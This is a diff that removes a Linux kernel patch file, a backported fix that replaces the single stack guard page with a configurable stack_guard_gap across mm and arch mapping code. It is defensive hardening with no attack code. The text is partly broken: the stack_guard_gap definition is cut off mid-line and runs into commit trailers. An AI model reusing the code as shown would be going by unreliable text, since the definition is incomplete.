-@@ -3174,10 +3129,6 @@ static int do_anonymous_page(struct mm_struct *mm, struct vm_area_struct *vma, - if (vma->vm_flags & VM_SHARED) - return VM_FAULT_SIGBUS; - -- /* Check if we need to add a guard page to the stack */ -- if (check_stack_guard_page(vma, address) < 0) -- return VM_FAULT_SIGSEGV; -- - /* Use the zero-page for reads */ - if (!(flags & FAULT_FLAG_WRITE)) { - entry = pte_mkspecial(pfn_pte(my_zero_pfn(address), -diff --git a/mm/mmap.c b/mm/mmap.c -index e949a20..cbcf486 100644 ---- a/mm/mmap.c -+++ b/mm/mmap.c -@@ -245,6 +245,7 @@ SYSCALL_DEFINE1(brk, unsigned long, brk) - unsigned long rlim, retval; - unsigned long newbrk, oldbrk; - struct mm_struct *mm = current->mm; -+ struct vm_area_struct *next; - unsigned long min_brk; - - down_write(&mm->mmap_sem); -@@ -289,7 +290,8 @@ SYSCALL_DEFINE1(brk, unsigned long, brk) - } - - /* Check against existing mmap mappings. */ -- if (find_vma_intersection(mm, oldbrk, newbrk+PAGE_SIZE)) -+ next = find_vma(mm, oldbrk); -+ if (next && newbrk + PAGE_SIZE > vm_start_gap(next)) - goto out; - - /* Ok, looks good - let it rip. 
*/ -@@ -1368,8 +1370,8 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr, - unsigned long len, unsigned long pgoff, unsigned long flags) - { - struct mm_struct *mm = current->mm; -- struct vm_area_struct *vma; -- unsigned long start_addr; -+ struct vm_area_struct *vma, *prev; -+ unsigned long start_addr, vm_start, prev_end; - - if (len > TASK_SIZE - mmap_min_addr) - return -ENOMEM; -@@ -1379,9 +1381,10 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr, - - if (addr) { - addr = PAGE_ALIGN(addr); -- vma = find_vma(mm, addr); -+ vma = find_vma_prev(mm, addr, &prev); - if (TASK_SIZE - len >= addr && addr >= mmap_min_addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma)) && -+ (!prev || addr >= vm_end_gap(prev))) - return addr; - } - if (len > mm->cached_hole_size) { -@@ -1392,7 +1395,17 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr, - } - - full_search: -- for (vma = find_vma(mm, addr); ; vma = vma->vm_next) { -+ for (vma = find_vma_prev(mm, addr, &prev); ; prev = vma, -+ vma = vma->vm_next) { -+ if (prev) { -+ prev_end = vm_end_gap(prev); -+ if (addr < prev_end) { -+ addr = prev_end; -+ /* If vma already violates gap, forget it */ -+ if (vma && addr > vma->vm_start) -+ addr = vma->vm_start; -+ } -+ } - /* At this point: (!vma || addr < vma->vm_end). */ - if (TASK_SIZE - len < addr) { - /* -@@ -1407,16 +1420,16 @@ full_search: - } - return -ENOMEM; - } -- if (!vma || addr + len <= vma->vm_start) { -+ vm_start = vma ? 
vm_start_gap(vma) : TASK_SIZE; -+ if (addr + len <= vm_start) { - /* - * Remember the place where we stopped the search: - */ - mm->free_area_cache = addr + len; - return addr; - } -- if (addr + mm->cached_hole_size < vma->vm_start) -- mm->cached_hole_size = vma->vm_start - addr; -- addr = vma->vm_end; -+ if (addr + mm->cached_hole_size < vm_start) -+ mm->cached_hole_size = vm_start - addr; - } - } - #endif -@@ -1442,9 +1455,10 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0, - const unsigned long len, const unsigned long pgoff, - const unsigned long flags) - { -- struct vm_area_struct *vma; -+ struct vm_area_struct *vma, *prev; - struct mm_struct *mm = current->mm; - unsigned long addr = addr0; -+ unsigned long vm_start, prev_end; - unsigned long low_limit = max(PAGE_SIZE, mmap_min_addr); - - /* requested length too big for entire address space */ -@@ -1457,9 +1471,10 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0, - /* requesting a specific address */ - if (addr) { - addr = PAGE_ALIGN(addr); -- vma = find_vma(mm, addr); -+ vma = find_vma_prev(mm, addr, &prev); - if (TASK_SIZE - len >= addr && addr >= mmap_min_addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma)) && -+ (!prev || addr >= vm_end_gap(prev))) - return addr; - } - -@@ -1474,8 +1489,9 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0, - - /* make sure it can fit in the remaining address space */ - if (addr >= low_limit + len) { -- vma = find_vma(mm, addr-len); -- if (!vma || addr <= vma->vm_start) -+ vma = find_vma_prev(mm, addr-len, &prev); -+ if ((!vma || addr <= vm_start_gap(vma)) && -+ (!prev || addr-len >= vm_end_gap(prev))) - /* remember the address as a hint for next time */ - return (mm->free_area_cache = addr-len); - } -@@ -1491,18 +1507,21 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0, - * else if new region fits below 
vma->vm_start, - * return with success: - */ -- vma = find_vma(mm, addr); -- if (!vma || addr+len <= vma->vm_start) -+ vma = find_vma_prev(mm, addr, &prev); -+ vm_start = vma ? vm_start_gap(vma) : mm->mmap_base; -+ prev_end = prev ? vm_end_gap(prev) : low_limit; -+ -+ if (addr + len <= vm_start && addr >= prev_end) - /* remember the address as a hint for next time */ - return (mm->free_area_cache = addr); - - /* remember the largest hole we saw so far */ -- if (addr + mm->cached_hole_size < vma->vm_start) -- mm->cached_hole_size = vma->vm_start - addr; -+ if (addr + mm->cached_hole_size < vm_start) -+ mm->cached_hole_size = vm_start - addr; - - /* try just below the current vma->vm_start */ -- addr = vma->vm_start-len; -- } while (vma->vm_start >= low_limit + len); -+ addr = vm_start - len; -+ } while (vm_start >= low_limit + len); - - bottomup: - /* -@@ -1647,21 +1666,19 @@ out: - * update accounting. This is shared with both the - * grow-up and grow-down cases. - */ --static int acct_stack_growth(struct vm_area_struct *vma, unsigned long size, unsigned long grow) -+static int acct_stack_growth(struct vm_area_struct *vma, -+ unsigned long size, unsigned long grow) - { - struct mm_struct *mm = vma->vm_mm; - struct rlimit *rlim = current->signal->rlim; -- unsigned long new_start, actual_size; -+ unsigned long new_start; - - /* address space limit tests */ - if (!may_expand_vm(mm, grow)) - return -ENOMEM; - - /* Stack limit test */ -- actual_size = size; -- if (size && (vma->vm_flags & (VM_GROWSUP | VM_GROWSDOWN))) -- actual_size -= PAGE_SIZE; -- if (actual_size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur)) -+ if (size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur)) - return -ENOMEM; - - /* mlock limit tests */ -@@ -1703,32 +1720,40 @@ static int acct_stack_growth(struct vm_area_struct *vma, unsigned long size, uns - */ - int expand_upwards(struct vm_area_struct *vma, unsigned long address) - { -- int error; -+ struct vm_area_struct *next; -+ unsigned long gap_addr; -+ int 
error = 0; - - if (!(vma->vm_flags & VM_GROWSUP)) - return -EFAULT; - -- /* -- * We must make sure the anon_vma is allocated -- * so that the anon_vma locking is not a noop. -- */ -+ /* Guard against wrapping around to address 0. */ -+ address &= PAGE_MASK; -+ address += PAGE_SIZE; -+ if (!address) -+ return -ENOMEM; -+ -+ /* Enforce stack_guard_gap */ -+ gap_addr = address + stack_guard_gap; -+ if (gap_addr < address) -+ return -ENOMEM; -+ next = vma->vm_next; -+ if (next && next->vm_start < gap_addr) { -+ if (!(next->vm_flags & VM_GROWSUP)) -+ return -ENOMEM; -+ /* Check that both stack segments have the same anon_vma? */ -+ } -+ -+ /* We must make sure the anon_vma is allocated. */ - if (unlikely(anon_vma_prepare(vma))) - return -ENOMEM; -- vma_lock_anon_vma(vma); - - /* - * vma->vm_start/vm_end cannot change under us because the caller - * is required to hold the mmap_sem in read mode. We need the - * anon_vma lock to serialize against concurrent expand_stacks. -- * Also guard against wrapping around to address 0. - */ -- if (address < PAGE_ALIGN(address+4)) -- address = PAGE_ALIGN(address+4); -- else { -- vma_unlock_anon_vma(vma); -- return -ENOMEM; -- } -- error = 0; -+ vma_lock_anon_vma(vma); - - /* Somebody else might have raced and expanded it already */ - if (address > vma->vm_end) { -@@ -1758,27 +1783,36 @@ int expand_upwards(struct vm_area_struct *vma, unsigned long address) - int expand_downwards(struct vm_area_struct *vma, - unsigned long address) - { -+ struct vm_area_struct *prev; -+ unsigned long gap_addr; - int error; - -- /* -- * We must make sure the anon_vma is allocated -- * so that the anon_vma locking is not a noop. 
-- */ -- if (unlikely(anon_vma_prepare(vma))) -- return -ENOMEM; -- - address &= PAGE_MASK; - error = security_file_mmap(NULL, 0, 0, 0, address, 1); - if (error) - return error; - -- vma_lock_anon_vma(vma); -+ /* Enforce stack_guard_gap */ -+ gap_addr = address - stack_guard_gap; -+ if (gap_addr > address) -+ return -ENOMEM; -+ prev = vma->vm_prev; -+ if (prev && prev->vm_end > gap_addr) { -+ if (!(prev->vm_flags & VM_GROWSDOWN)) -+ return -ENOMEM; -+ /* Check that both stack segments have the same anon_vma? */ -+ } -+ -+ /* We must make sure the anon_vma is allocated. */ -+ if (unlikely(anon_vma_prepare(vma))) -+ return -ENOMEM; - - /* - * vma->vm_start/vm_end cannot change under us because the caller - * is required to hold the mmap_sem in read mode. We need the - * anon_vma lock to serialize against concurrent expand_stacks. - */ -+ vma_lock_anon_vma(vma); - - /* Somebody else might have raced and expanded it already */ - if (address < vma->vm_start) { -@@ -1802,28 +1836,25 @@ int expand_downwards(struct vm_area_struct *vma, - return error; - } - --/* -- * Note how expand_stack() refuses to expand the stack all the way to -- * abut the next virtual mapping, *unless* that mapping itself is also -- * a stack mapping. We want to leave room for a guard page, after all -- * (the guard page itself is not added here, that is done by the -- * actual page faulting logic) -- * -- * This matches the behavior of the guard page logic (see mm/memory.c: -- * check_stack_guard_page()), which only allows the guard page to be -- * removed under these circumstances. -- */ -+/* enforced gap between the expanding stack and other mappings. 
*/ -+unsigned long stack_guard_gap = 256UL< -Original-patch-by: Michal Hocko -Signed-off-by: Hugh Dickins -[wt: backport to 4.11: adjust context] -[wt: backport to 4.9: adjust context ; kernel doc was not in admin-guide] -[wt: backport to 4.4: adjust context ; drop ppc hugetlb_radix changes] -[wt: backport to 3.18: adjust context ; no FOLL_POPULATE ; - s390 uses generic arch_get_unmapped_area()] -[wt: backport to 3.16: adjust context] -[wt: backport to 3.10: adjust context ; code logic in PARISC's - arch_get_unmapped_area() wasn't found ; code inserted into - expand_upwards() and expand_downwards() runs under anon_vma lock; - changes for gup.c:faultin_page go to memory.c:__get_user_pages(); - included Hugh Dickins' fixes] -Signed-off-by: Willy Tarreau -Signed-off-by: Flex1911 ---- - -diff --git a/Documentation/kernel-parameters.txt b/Documentation/kernel-parameters.txt -index 9a1c759..53be2c9 100644 ---- a/Documentation/kernel-parameters.txt -+++ b/Documentation/kernel-parameters.txt -@@ -2550,6 +2550,13 @@ - spia_pedr= - spia_peddr= - -+ stack_guard_gap= [MM] -+ override the default stack gap protection. The value -+ is in page units and it defines how many pages prior -+ to (for stacks growing down) resp. after (for stacks -+ growing up) the main stack are reserved for no other -+ mapping. Default value is 256 pages. -+ - stacktrace [FTRACE] - Enabled the stack tracer on boot up. 
-
-diff --git a/arch/arm/mm/mmap.c b/arch/arm/mm/mmap.c
-index a26960a..f058ca2 100644
---- a/arch/arm/mm/mmap.c
-+++ b/arch/arm/mm/mmap.c
-@@ -101,7 +101,7 @@
-
- vma = find_vma(mm, addr);
- if (TASK_SIZE - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
- if (len > mm->cached_hole_size) {
-@@ -183,7 +183,7 @@
- addr = PAGE_ALIGN(addr);
- vma = find_vma(mm, addr);
- if (TASK_SIZE - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
-
-diff --git a/arch/frv/mm/elf-fdpic.c b/arch/frv/mm/elf-fdpic.c
-index 385fd30..cd76056 100644
---- a/arch/frv/mm/elf-fdpic.c
-+++ b/arch/frv/mm/elf-fdpic.c
-@@ -74,7 +74,7 @@
- addr = PAGE_ALIGN(addr);
- vma = find_vma(current->mm, addr);
- if (TASK_SIZE - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- goto success;
- }
-
-diff --git a/arch/mips/mm/mmap.c b/arch/mips/mm/mmap.c
-index 302d779..63c07bd 100644
---- a/arch/mips/mm/mmap.c
-+++ b/arch/mips/mm/mmap.c
-@@ -103,7 +103,7 @@
-
- vma = find_vma(mm, addr);
- if (TASK_SIZE - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
-
-diff --git a/arch/powerpc/mm/slice.c b/arch/powerpc/mm/slice.c
-index 73709f7..9cf001f 100644
---- a/arch/powerpc/mm/slice.c
-+++ b/arch/powerpc/mm/slice.c
-@@ -98,7 +98,7 @@
- if ((mm->task_size - len) < addr)
- return 0;
- vma = find_vma(mm, addr);
-- return (!vma || (addr + len) <= vma->vm_start);
-+ return (!vma || (addr + len) <= vm_start_gap(vma));
- }
-
- static int slice_low_has_vma(struct mm_struct *mm, unsigned long slice)
-diff --git a/arch/sh/mm/mmap.c b/arch/sh/mm/mmap.c
-index afeb710..d027416 100644
---- a/arch/sh/mm/mmap.c
-+++ b/arch/sh/mm/mmap.c
-@@ -75,7 +75,7 @@
-
- vma = find_vma(mm, addr);
- if (TASK_SIZE - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
-
-@@ -158,7 +158,7 @@
-
- vma = find_vma(mm, addr);
- if (TASK_SIZE - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
-
-diff --git a/arch/sparc/kernel/sys_sparc_64.c b/arch/sparc/kernel/sys_sparc_64.c
-index 3ee51f1..10a83ac 100644
---- a/arch/sparc/kernel/sys_sparc_64.c
-+++ b/arch/sparc/kernel/sys_sparc_64.c
-@@ -147,7 +147,7 @@
-
- vma = find_vma(mm, addr);
- if (task_size - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
-
-@@ -237,7 +237,7 @@
-
- vma = find_vma(mm, addr);
- if (task_size - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
-
-diff --git a/arch/sparc/mm/hugetlbpage.c b/arch/sparc/mm/hugetlbpage.c
-index 07e1453..9f07641 100644
---- a/arch/sparc/mm/hugetlbpage.c
-+++ b/arch/sparc/mm/hugetlbpage.c
-@@ -182,7 +182,7 @@
- addr = ALIGN(addr, HPAGE_SIZE);
- vma = find_vma(mm, addr);
- if (task_size - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
- if (mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/arch/tile/mm/hugetlbpage.c b/arch/tile/mm/hugetlbpage.c
-index 42cfcba..d659736 100644
---- a/arch/tile/mm/hugetlbpage.c
-+++ b/arch/tile/mm/hugetlbpage.c
-@@ -312,7 +312,7 @@
- addr = ALIGN(addr, huge_page_size(h));
- vma = find_vma(mm, addr);
- if (TASK_SIZE - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
- if (current->mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/arch/x86/kernel/sys_x86_64.c b/arch/x86/kernel/sys_x86_64.c
-index b4d3c39..996378b 100644
---- a/arch/x86/kernel/sys_x86_64.c
-+++ b/arch/x86/kernel/sys_x86_64.c
-@@ -141,7 +141,7 @@
- addr = PAGE_ALIGN(addr);
- vma = find_vma(mm, addr);
- if (end - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
- if (((flags & MAP_32BIT) || test_thread_flag(TIF_ADDR32))
-@@ -213,7 +213,7 @@
- addr = PAGE_ALIGN(addr);
- vma = find_vma(mm, addr);
- if (TASK_SIZE - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
-
-diff --git a/arch/x86/mm/hugetlbpage.c b/arch/x86/mm/hugetlbpage.c
-index f6679a7..dbc90e6 100644
---- a/arch/x86/mm/hugetlbpage.c
-+++ b/arch/x86/mm/hugetlbpage.c
-@@ -411,7 +411,7 @@
- addr = ALIGN(addr, huge_page_size(h));
- vma = find_vma(mm, addr);
- if (TASK_SIZE - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
- if (mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/fs/hugetlbfs/inode.c b/fs/hugetlbfs/inode.c
-index 001ef01..628b324 100644
---- a/fs/hugetlbfs/inode.c
-+++ b/fs/hugetlbfs/inode.c
-@@ -169,7 +169,7 @@
- addr = ALIGN(addr, huge_page_size(h));
- vma = find_vma(mm, addr);
- if (TASK_SIZE - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
-
-diff --git a/fs/proc/task_mmu.c b/fs/proc/task_mmu.c
-index ef5c7e2..6234004 100644
---- a/fs/proc/task_mmu.c
-+++ b/fs/proc/task_mmu.c
-@@ -283,11 +283,7 @@
-
- /* We don't show the stack guard page in /proc/maps */
- start = vma->vm_start;
-- if (stack_guard_page_start(vma, start))
-- start += PAGE_SIZE;
- end = vma->vm_end;
-- if (stack_guard_page_end(vma, end))
-- end -= PAGE_SIZE;
-
- seq_printf(m, "%08lx-%08lx %c%c%c%c %08llx %02x:%02x %lu %n",
- start,
-diff --git a/include/linux/mm.h b/include/linux/mm.h
-index ce57fd0..e597775 100644
---- a/include/linux/mm.h
-+++ b/include/linux/mm.h
-@@ -1030,34 +1030,6 @@
- int set_page_dirty_lock(struct page *page);
- int clear_page_dirty_for_io(struct page *page);
-
--/* Is the vma a
continuation of the stack vma above it? */ --static inline int vma_growsdown(struct vm_area_struct *vma, unsigned long addr) --{ -- return vma && (vma->vm_end == addr) && (vma->vm_flags & VM_GROWSDOWN); --} -- --static inline int stack_guard_page_start(struct vm_area_struct *vma, -- unsigned long addr) --{ -- return (vma->vm_flags & VM_GROWSDOWN) && -- (vma->vm_start == addr) && -- !vma_growsdown(vma->vm_prev, addr); --} -- --/* Is the vma a continuation of the stack vma below it? */ --static inline int vma_growsup(struct vm_area_struct *vma, unsigned long addr) --{ -- return vma && (vma->vm_start == addr) && (vma->vm_flags & VM_GROWSUP); --} -- --static inline int stack_guard_page_end(struct vm_area_struct *vma, -- unsigned long addr) --{ -- return (vma->vm_flags & VM_GROWSUP) && -- (vma->vm_end == addr) && -- !vma_growsup(vma->vm_next, addr); --} -- - extern pid_t - vm_is_stack(struct task_struct *task, struct vm_area_struct *vma, int in_group); - -@@ -1467,6 +1439,7 @@ - struct address_space *mapping, - struct file *filp); - -+extern unsigned long stack_guard_gap; - /* Generic expand stack which grows the stack according to GROWS{UP,DOWN} */ - extern int expand_stack(struct vm_area_struct *vma, unsigned long address); - -@@ -1495,6 +1468,30 @@ - return vma; - } - -+static inline unsigned long vm_start_gap(struct vm_area_struct *vma) -+{ -+ unsigned long vm_start = vma->vm_start; -+ -+ if (vma->vm_flags & VM_GROWSDOWN) { -+ vm_start -= stack_guard_gap; -+ if (vm_start > vma->vm_start) -+ vm_start = 0; -+ } -+ return vm_start; -+} -+ -+static inline unsigned long vm_end_gap(struct vm_area_struct *vma) -+{ -+ unsigned long vm_end = vma->vm_end; -+ -+ if (vma->vm_flags & VM_GROWSUP) { -+ vm_end += stack_guard_gap; -+ if (vm_end < vma->vm_end) -+ vm_end = -PAGE_SIZE; -+ } -+ return vm_end; -+} -+ - static inline unsigned long vma_pages(struct vm_area_struct *vma) - { - return (vma->vm_end - vma->vm_start) >> PAGE_SHIFT; -diff --git a/mm/memory.c b/mm/memory.c -index 
60a7dfc..e722760 100644 ---- a/mm/memory.c -+++ b/mm/memory.c -@@ -1619,12 +1619,6 @@ - return page; - } - --static inline int stack_guard_page(struct vm_area_struct *vma, unsigned long addr) --{ -- return stack_guard_page_start(vma, addr) || -- stack_guard_page_end(vma, addr+PAGE_SIZE); --} -- - /** - * __get_user_pages() - pin user pages in memory - * @tsk: task_struct of target task -@@ -1775,11 +1769,6 @@ - int ret; - unsigned int fault_flags = 0; - -- /* For mlock, just skip the stack guard page. */ -- if (foll_flags & FOLL_MLOCK) { -- if (stack_guard_page(vma, start)) -- goto next_page; -- } - if (foll_flags & FOLL_WRITE) - fault_flags |= FAULT_FLAG_WRITE; - if (nonblocking) -@@ -3087,40 +3076,6 @@ - } - - /* -- * This is like a special single-page "expand_{down|up}wards()", -- * except we must first make sure that 'address{-|+}PAGE_SIZE' -- * doesn't hit another vma. -- */ --static inline int check_stack_guard_page(struct vm_area_struct *vma, unsigned long address) --{ -- address &= PAGE_MASK; -- if ((vma->vm_flags & VM_GROWSDOWN) && address == vma->vm_start) { -- struct vm_area_struct *prev = vma->vm_prev; -- -- /* -- * Is there a mapping abutting this one below? -- * -- * That's only ok if it's the same stack mapping -- * that has gotten split.. -- */ -- if (prev && prev->vm_end == address) -- return prev->vm_flags & VM_GROWSDOWN ? 0 : -ENOMEM; -- -- expand_downwards(vma, address - PAGE_SIZE); -- } -- if ((vma->vm_flags & VM_GROWSUP) && address + PAGE_SIZE == vma->vm_end) { -- struct vm_area_struct *next = vma->vm_next; -- -- /* As VM_GROWSDOWN but s/below/above/ */ -- if (next && next->vm_start == address + PAGE_SIZE) -- return next->vm_flags & VM_GROWSUP ? 0 : -ENOMEM; -- -- expand_upwards(vma, address + PAGE_SIZE); -- } -- return 0; --} -- --/* - * We enter with non-exclusive mmap_sem (to exclude vma changes, - * but allow concurrent faults), and pte mapped but not yet locked. - * We return with mmap_sem still held, but pte unmapped and unlocked. 
-@@ -3137,10 +3092,6 @@ - - /* File mapping without ->vm_ops ? */ - if (vma->vm_flags & VM_SHARED) -- return VM_FAULT_SIGBUS; -- -- /* Check if we need to add a guard page to the stack */ -- if (check_stack_guard_page(vma, address) < 0) - return VM_FAULT_SIGBUS; - - /* Use the zero-page for reads */ -diff --git a/mm/mmap.c b/mm/mmap.c -index e495a84..b94a982 100644 ---- a/mm/mmap.c -+++ b/mm/mmap.c -@@ -259,6 +259,7 @@ - unsigned long rlim, retval; - unsigned long newbrk, oldbrk; - struct mm_struct *mm = current->mm; -+ struct vm_area_struct *next; - unsigned long min_brk; - - down_write(&mm->mmap_sem); -@@ -303,7 +304,8 @@ - } - - /* Check against existing mmap mappings. */ -- if (find_vma_intersection(mm, oldbrk, newbrk+PAGE_SIZE)) -+ next = find_vma(mm, oldbrk); -+ if (next && newbrk + PAGE_SIZE > vm_start_gap(next)) - goto out; - - /* Ok, looks good - let it rip. */ -@@ -1426,8 +1428,8 @@ - unsigned long len, unsigned long pgoff, unsigned long flags) - { - struct mm_struct *mm = current->mm; -- struct vm_area_struct *vma; -- unsigned long start_addr; -+ struct vm_area_struct *vma, *prev; -+ unsigned long start_addr, vm_start, prev_end; - - if (len > TASK_SIZE) - return -ENOMEM; -@@ -1437,9 +1439,10 @@ - - if (addr) { - addr = PAGE_ALIGN(addr); -- vma = find_vma(mm, addr); -+ vma = find_vma_prev(mm, addr, &prev); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma)) && -+ (!prev || addr >= vm_end_gap(prev))) - return addr; - } - if (len > mm->cached_hole_size) { -@@ -1450,7 +1453,17 @@ - } - - full_search: -- for (vma = find_vma(mm, addr); ; vma = vma->vm_next) { -+ for (vma = find_vma_prev(mm, addr, &prev); ; prev = vma, -+ vma = vma->vm_next) { -+ if (prev) { -+ prev_end = vm_end_gap(prev); -+ if (addr < prev_end) { -+ addr = prev_end; -+ /* If vma already violates gap, forget it */ -+ if (vma && addr > vma->vm_start) -+ addr = vma->vm_start; -+ } -+ } - /* At this point: (!vma || addr < 
vma->vm_end). */ - if (TASK_SIZE - len < addr) { - /* -@@ -1465,16 +1478,16 @@ - } - return -ENOMEM; - } -- if (!vma || addr + len <= vma->vm_start) { -+ vm_start = vma ? vm_start_gap(vma) : TASK_SIZE; -+ if (addr + len <= vm_start) { - /* - * Remember the place where we stopped the search: - */ - mm->free_area_cache = addr + len; - return addr; - } -- if (addr + mm->cached_hole_size < vma->vm_start) -- mm->cached_hole_size = vma->vm_start - addr; -- addr = vma->vm_end; -+ if (addr + mm->cached_hole_size < vm_start) -+ mm->cached_hole_size = vm_start - addr; - } - } - #endif -@@ -1498,9 +1511,10 @@ - const unsigned long len, const unsigned long pgoff, - const unsigned long flags) - { -- struct vm_area_struct *vma; -+ struct vm_area_struct *vma, *prev; - struct mm_struct *mm = current->mm; - unsigned long addr = addr0, start_addr; -+ unsigned long vm_start, prev_end; - - /* requested length too big for entire address space */ - if (len > TASK_SIZE) -@@ -1512,9 +1526,10 @@ - /* requesting a specific address */ - if (addr) { - addr = PAGE_ALIGN(addr); -- vma = find_vma(mm, addr); -+ vma = find_vma_prev(mm, addr, &prev); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma)) && -+ (!prev || addr >= vm_end_gap(prev))) - return addr; - } - -@@ -1538,18 +1553,21 @@ - * else if new region fits below vma->vm_start, - * return with success: - */ -- vma = find_vma(mm, addr); -- if (!vma || addr+len <= vma->vm_start) -+ vma = find_vma_prev(mm, addr, &prev); -+ vm_start = vma ? 
vm_start_gap(vma) : mm->mmap_base; -+ prev_end = vm_end_gap(prev); -+ -+ if (addr + len <= vm_start && addr >= prev_end) - /* remember the address as a hint for next time */ - return (mm->free_area_cache = addr); - - /* remember the largest hole we saw so far */ -- if (addr + mm->cached_hole_size < vma->vm_start) -- mm->cached_hole_size = vma->vm_start - addr; -- -+ if (addr + mm->cached_hole_size < vm_start) -+ mm->cached_hole_size = vm_start - addr; -+ - /* try just below the current vma->vm_start */ -- addr = vma->vm_start-len; -- } while (len < vma->vm_start); -+ addr = vm_start - len; -+ } while (len < vm_start); - - fail: - /* -@@ -1749,7 +1767,9 @@ - */ - int expand_upwards(struct vm_area_struct *vma, unsigned long address) - { -- int error; -+ struct vm_area_struct *next; -+ unsigned long gap_addr; -+ int error = 0; - - if (!(vma->vm_flags & VM_GROWSUP)) - return -EFAULT; -@@ -1758,23 +1778,33 @@ - * We must make sure the anon_vma is allocated - * so that the anon_vma locking is not a noop. - */ -+ /* Guard against wrapping around to address 0. */ -+ address &= PAGE_MASK; -+ address += PAGE_SIZE; -+ if (!address) -+ return -ENOMEM; -+ -+ /* Enforce stack_guard_gap */ -+ gap_addr = address + stack_guard_gap; -+ if (gap_addr < address) -+ return -ENOMEM; -+ next = vma->vm_next; -+ if (next && next->vm_start < gap_addr) { -+ if (!(next->vm_flags & VM_GROWSUP)) -+ return -ENOMEM; -+ /* Check that both stack segments have the same anon_vma? */ -+ } -+ -+ /* We must make sure the anon_vma is allocated. */ - if (unlikely(anon_vma_prepare(vma))) - return -ENOMEM; -- vma_lock_anon_vma(vma); - - /* - * vma->vm_start/vm_end cannot change under us because the caller - * is required to hold the mmap_sem in read mode. We need the - * anon_vma lock to serialize against concurrent expand_stacks. -- * Also guard against wrapping around to address 0. 
- */ -- if (address < PAGE_ALIGN(address+4)) -- address = PAGE_ALIGN(address+4); -- else { -- vma_unlock_anon_vma(vma); -- return -ENOMEM; -- } -- error = 0; -+ vma_lock_anon_vma(vma); - - /* Somebody else might have raced and expanded it already */ - if (address > vma->vm_end) { -@@ -1804,27 +1834,36 @@ - int expand_downwards(struct vm_area_struct *vma, - unsigned long address) - { -+ struct vm_area_struct *prev; -+ unsigned long gap_addr; - int error; -- -- /* -- * We must make sure the anon_vma is allocated -- * so that the anon_vma locking is not a noop. -- */ -- if (unlikely(anon_vma_prepare(vma))) -- return -ENOMEM; - - address &= PAGE_MASK; - error = security_file_mmap(NULL, 0, 0, 0, address, 1); - if (error) - return error; - -- vma_lock_anon_vma(vma); -+ /* Enforce stack_guard_gap */ -+ gap_addr = address - stack_guard_gap; -+ if (gap_addr > address) -+ return -ENOMEM; -+ prev = vma->vm_prev; -+ if (prev && prev->vm_end > gap_addr) { -+ if (!(prev->vm_flags & VM_GROWSDOWN)) -+ return -ENOMEM; -+ /* Check that both stack segments have the same anon_vma? */ -+ } -+ -+ /* We must make sure the anon_vma is allocated. */ -+ if (unlikely(anon_vma_prepare(vma))) -+ return -ENOMEM; - - /* - * vma->vm_start/vm_end cannot change under us because the caller - * is required to hold the mmap_sem in read mode. We need the - * anon_vma lock to serialize against concurrent expand_stacks. - */ -+ vma_lock_anon_vma(vma); - - /* Somebody else might have raced and expanded it already */ - if (address < vma->vm_start) { -@@ -1848,6 +1887,23 @@ - return error; - } - -+/* enforced gap between the expanding stack and other mappings. 
